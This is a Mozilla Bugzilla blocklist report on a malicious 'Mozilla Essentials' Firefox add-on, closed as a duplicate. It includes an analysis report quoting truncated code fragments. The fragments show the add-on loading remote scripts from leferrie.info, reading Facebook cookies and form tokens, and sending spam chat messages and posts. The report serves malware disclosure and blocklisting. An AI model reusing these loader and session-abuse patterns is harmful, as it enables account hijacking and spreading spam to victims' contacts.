Closed Bug 728487 Opened 13 years ago Closed 13 years ago

Malicious "Mozilla Essentials" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 721646

People

(Reporter: mhammell, Unassigned)

Details

Attachments

(1 file)

82.80 KB, application/octet-stream
Details
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 Steps to reproduce: Downloaded add-on from http://spacetube.info/aranha/essentials.xpi Actual results: Report for http://spacetube.info/aranha/essentials.xpi ** Embedded and Remote Files ** chrome.txt chrome.manifest install.txt content/prefman.js content/skin/icon.png content/script-compiler.js content/youtube.js http://leferrie.info/s.js http://leferrie.info/ar.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul install.rdf ** Embedded Metadata ** em:minVersion="2.0" em:maxVersion="10.*" /> em:name="Mozilla Essentials" em:version="2.0.0" em:creator="Le Peri" em:iconURL="chrome://youtube/content/skin/icon.png" em:description="Mozilla Essentials" em:homepageURL="http://sairama.info" em:updateURL="http://sairama.info/test/update.rdf" em:updateKey="MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrhDV2GSwhgy/KcSSKVXvwlEAwQU... <em:targetApplication RDF:resource="rdf:#$gT6Sx1"/> em:minVersion="2.0" em:maxVersion="10.*" /> em:name="Mozilla Essentials" em:version="2.0.0" em:creator="Le Peri" em:iconURL="chrome://youtube/content/skin/icon.png" em:description="Mozilla Essentials" em:homepageURL="http://sairama.info" <em:targetApplication RDF:resource="rdf:#$gT6Sx1"/> ** Files Loaded ** ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... em:iconURL="chrome://youtube/content/skin/icon.png" 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... 
em:iconURL="chrome://youtube/content/skin/icon.png" ** Remote Javascript Loaded ** ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul <RDF:Description RDF:about="rdf:#$gT6Sx1" <RDF:Description RDF:about="urn:mozilla:install-manifest" em:description="Mozilla Essentials" </RDF:Description> var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://leferrie.info/s.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://leferrie.info/ar.js"); var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... 
<RDF:Description RDF:about="rdf:#$gT6Sx1" <RDF:Description RDF:about="urn:mozilla:install-manifest" em:description="Mozilla Essentials" </RDF:Description> ** Facebook Paths Accessed ** ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... var urlwp = '/ajax/profile/composer.php?__a=1'; var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; ...var automessages = new Array('Novo Facebook 2012 na area !!\x0Afacebook.com/phot... ...xei link pro novo perfil FB 2012 :P\x0Afacebook.com/photo.php?fbid=170162876431... var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var urlwp = '/ajax/events/permalink/join.php?__a=1'; var urlwp = '/ajax/events/invite/send/?__a=1'; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... ** Facebook Cookies Accessed ** var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; ...]['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); ...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=... ...nder=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...ine=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...eader&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id... ...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...et_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...pst="post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feedback_params="... ** HTTP Requests ** gf = new XMLHttpRequest(); ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... 
var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var http3 = new XMLHttpRequest(); http3.open("POST", url3, true); var httpc = new XMLHttpRequest(); httpc.open("POST", urlc, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); with(newx = new XMLHttpRequest()) ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** <RDF:RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> em:homepageURL="http://sairama.info" em:updateURL="http://sairama.info/test/update.rdf" // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjq... s.setAttribute("src", "http://leferrie.info/ar.js"); s.setAttribute("src", "http://leferrie.info/s.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... 
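<RDF:RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> em:homepageURL="http://sairama.info"

Expected results: The add-on should not steal your Facebook cookies or send messages to Facebook without your consent. The excerpts above show it reading the c_user value from document.cookie and the fb_dtsg form token from the page, then building requests to Facebook chat, composer, event and page endpoints; the excerpts are truncated, so they do not show on their own whether those values are also sent to another host.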
Same id as bug 721646.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Product: addons.mozilla.org → Toolkit
